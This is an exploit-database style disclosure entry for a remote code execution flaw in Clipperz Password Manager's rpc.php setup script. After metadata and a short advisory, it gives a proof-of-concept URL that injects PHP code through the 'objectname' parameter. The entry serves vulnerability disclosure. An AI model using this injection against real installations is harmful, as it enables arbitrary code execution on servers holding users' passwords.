Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution
Author: Manish Tanwar
type: webapps
platform: php
port:
date_added: 2014-05-20
date_updated: 2016-01-07
verified: 1
codes: OSVDB-107137
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/67498/info
Clipperz Password Manager is prone to remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application.
http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die